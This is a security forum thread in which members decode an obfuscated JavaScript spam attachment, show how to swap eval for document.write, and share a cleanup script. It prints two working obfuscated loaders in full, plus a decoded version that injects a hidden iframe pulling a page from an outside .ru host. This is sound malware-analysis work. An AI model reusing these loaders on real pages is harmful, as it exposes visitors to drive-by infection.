EH-Net
Topic: Looking for Javascript coder to decode spam HTML attachment (Read 8820 times)
lorddicranius
« on: March 05, 2012, 05:23:07 PM »

I received a spam message with an HTML attachment. I downloaded the attachment and opened it in Notepad++ and found it contains Javascript. I know a little Javascript, but not nearly enough to work out what's going on here. I was wondering if anybody well versed in Javascript could decode this for me. I'm really curious what this is trying to do :)

Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

GSEC, eCPPT, Sec+
BillV
« Reply #1 on: March 05, 2012, 06:03:04 PM »

Wants you to load some php file from a .ru domain
hxxp://clkjshdflhhshdf.ru:8080/images/aublbzdni.php

Code:
// Decoded attachment (38 + n per value). The forum display had stripped the
// <iframe> tag out of the document.write string; it is restored from the encoded data.
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
document.write("<iframe src='http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); }
function iframer() {
var f = document.createElement('iframe'); f.setAttribute('src', 'http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden'; f.style.position='absolute'; f.style.left='0';
f.style.top='0'; f.setAttribute('width','10'); f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f); }
« Last Edit: March 05, 2012, 06:05:11 PM by BillV »
BillV
« Reply #2 on: March 05, 2012, 06:14:42 PM »

Also, the quick and easy way to decode what you had into what I had...

First, we take what you had:

Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

And turn it into something a bit more legible (I've shortened the value of the variable 'f' here to save space):

Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29q...'.split('q');  // shortened here; the full 'q'-separated string is in the original above
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      e(s);
}
</script>

A quick glance at the very end tells us to do e(s); and looking up a few lines higher we see e=eval;. So, rather than evaluating s, let's just see what it is by changing the code to document.write(s);:

Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29q...'.split('q');  // shortened here; the full 'q'-separated string is in the original above
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      document.write(s);
}
</script>

Throw that into a file, save it as whatever.html, and open in a browser. Then you end up with the code posted previously and can see it's attempting to load that PHP file. It doesn't always work this easily, sometimes you have to dig a little deeper depending on how much of a PITA the author was ;-)

...and obviously it's recommended to do this in some sort of a contained environment (just in case).
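The same last step BillV describes (run the character-building loop, but never hand the result to eval) as a stand-alone script, added here as an example and not part of this thread. The encoded sample and the URL inside it are constructed for the example; the offset 38 and the 'q' separator are the ones from the attachment above, and decodeWithOffsetFn goes a step further than the thread by also handling payloads whose offset depends on the index, like the second sample posted later in this thread (w[j] + 9 + j % 3).

```javascript
// Added example, not code from the thread. Decodes the "split('q') then
// String.fromCharCode(offset + n)" scheme statically, so nothing is evaluated.

// Fixed-offset variant (the attachment above): each number n becomes char code 38 + n.
function decodeQString(encoded, offset, sep = "q") {
  return encoded
    .split(sep)
    .map((n) => String.fromCharCode(offset + Number(n)))
    .join("");
}

// Generalised variant: the later sample in the thread computes w[j] + 9 + j % 3,
// so take the offset as a function of the index instead of a constant.
function decodeWithOffsetFn(values, offsetFn) {
  let out = "";
  for (let j = 0; j < values.length; j++) {
    out += String.fromCharCode(Number(values[j]) + offsetFn(j));
  }
  return out;
}

// Encoder used only to build the constructed sample below (reverse of the decode loop).
function encodeQString(text, offset, sep = "q") {
  return Array.from(text, (ch) => ch.charCodeAt(0) - offset).join(sep);
}

// Constructed sample: plaintext with an iframe and a placeholder URL, encoded the
// same way as the attachment. A real case would paste the attachment's string here.
const SAMPLE_PLAINTEXT =
  "document.write('<iframe src=\"http://example.invalid/x.php\" width=\"10\"></iframe>');";
const SAMPLE_ENCODED = encodeQString(SAMPLE_PLAINTEXT, 38);

// What a defender wants out of the decoded text: injected tags and the URLs they load.
function findIndicators(decoded) {
  const hits = [];
  if (/<iframe/i.test(decoded)) hits.push("iframe");
  const urls = decoded.match(/https?:\/\/[^\s'"<>]+/g) || [];
  return { hits, urls };
}

const decoded = decodeQString(SAMPLE_ENCODED, 38);
console.log(decoded);
console.log(findIndicators(decoded));
```

Run it with node; the decoded text is reported with its indicators rather than executed, which is the "document.write(s) instead of e(s)" idea without needing a browser.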
hayabusa
« Reply #3 on: March 05, 2012, 08:06:05 PM »

Reminds me a bit of the post I wrote on here, a couple of months ago, where I showed some malicious scripts I found during a security eval for a company's website.  I gave a similar writeup / explanation there, although the code was somewhat different.

~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
lorddicranius
« Reply #4 on: March 06, 2012, 12:44:06 AM »

@BillV: Thanks, especially for breaking it down :)
@hayabusa: Yeah, as soon as I opened that file in Notepad++, I thought of that post you did, which had me thinking this might at least pique your interest if nobody else's :P

Tried to download that PHP file, but I'm unable to resolve the domain. Darn, curious what's in that PHP file :(
« Last Edit: March 06, 2012, 12:57:22 AM by lorddicranius »

GSEC, eCPPT, Sec+
ajohnson
aka dynamik
« Reply #5 on: March 06, 2012, 07:39:21 AM »

See attachment. wget is your friend ;)

*unless it's a trick to exploit wget

Just glancing at it, seems like it's for ad revenue, but I don't have time to go in depth.

I do like the naming conventions they used though: onload="window.lol&&lol()"
« Last Edit: March 06, 2012, 07:41:22 AM by ajohnson »

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
lorddicranius
« Reply #6 on: March 06, 2012, 09:29:01 AM »

Hmm, I was using wget haha.  I was playing around with the URL, replacing "1" for lowercase "L", etc.

Thanks for attaching!

GSEC, eCPPT, Sec+
Agentcalaver
« Reply #7 on: April 02, 2012, 02:52:32 AM »

Clean this (the same/similar js exists in infected html web pages)
with a bash script such as:
Code:
OLD="^<script>c=2;[^>]*>"
echo "Pre:"
grep -rl "hgberger" *
grep -rl "hgberger" * | xargs sed -i "s/$OLD//g"
echo "Post:"
grep -rl "hgberger" *
rserin75
« Reply #8 on: August 10, 2012, 06:36:54 PM »

I need to decode this code:
Code:
<script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,103,108,105,104,105,91,99,37,95,99,93,101,36,88,39,38,30,22,108,96,90,105,95,51,28,40,38,28,23,94,90,96,93,93,107,51,28,40,38,28,23,105,105,112,98,90,52,29,107,96,105,94,89,95,97,96,106,110,49,94,94,91,90,90,101,49,101,102,105,94,107,95,100,101,48,86,89,105,100,99,107,105,92,49,97,92,92,105,49,38,48,107,101,101,49,38,48,30,52,49,38,95,91,105,87,98,92,52,23,32,49,2,0,-1,114,4,-1,-2,93,107,99,90,106,94,102,100,21,96,92,103,88,99,90,105,30,30,114,3,-2,0,-1,107,88,104,21,93,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,104,105,89,28,35,29,93,107,106,101,49,37,36,105,107,104,106,104,90,101,36,94,101,92,100,38,87,38,40,29,30,50,92,35,106,106,110,99,91,35,109,95,104,96,88,94,99,95,105,112,51,28,95,95,89,91,91,99,30,49,91,37,105,105,112,98,90,37,102,100,106,95,105,96,101,99,52,29,86,89,105,100,99,107,105,92,29,48,93,36,104,107,111,97,92,36,97,92,92,105,52,29,37,30,49,91,37,105,105,112,98,90,37,106,100,103,51,28,39,29,48,93,36,104,92,106,54,107,106,103,96,88,106,107,91,29,30,109,94,91,106,93,30,34,28,40,38,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,95,91,94,94,94,105,30,34,28,40,38,28,32,49,2,0,-1,-2,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,36,86,103,102,90,101,90,56,95,95,97,91,30,91,32,49,2,0,-1,114];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+555!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>
« Last Edit: August 10, 2012, 06:42:14 PM by rserin75 »
BillV
« Reply #9 on: August 13, 2012, 02:21:51 PM »

Quoting rserin75: "I need to decode this code"

Looks to be similar (e.g., ends in "e(s)"). Follow the instructions and it should be easily determined.
© 2013 The Ethical Hacker Network